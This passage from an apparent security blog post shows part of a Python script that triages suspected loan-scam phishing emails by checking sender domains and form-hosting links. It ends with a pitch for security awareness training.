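    sender_domain = msg["From"].addresses[0].domain
    rel = domain_relation(sender_domain, legit_domain)
    if rel != "legit":
        flags.append(f"sender: {sender_domain} is {rel} to {legit_domain}")

    # 3. Where the "application" actually goes.
    body = msg.get_body(preferencelist=("html", "plain"))
    for href in re.findall(r'href="([^"]+)"', body.get_content() if body else ""):
        host = urlsplit(href).netloc.lower()
        if host in GENERIC_FORM_HOSTS:
            flags.append(f"link: application form hosted on {host}, not the lender's site")
    return flags


if __name__ == "__main__":
    for flag in triage(SAMPLE_EML, "bob@example.com", "sba.gov"):
        print("-", flag)
```

None of these checks is conclusive on its own (plenty of legitimate bulk mail is BCC’d, and small businesses do use hosted forms), but a message that trips all three is exactly the one to route to a reviewer rather than the inbox.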

Users can easily avoid becoming the victim of such scams once they look at email and web content through a scrutinizing lens. This only comes through continual Security Awareness Training that educates users on what to look for, the types of scams that occur, and how to keep a vigilant mindset while working.
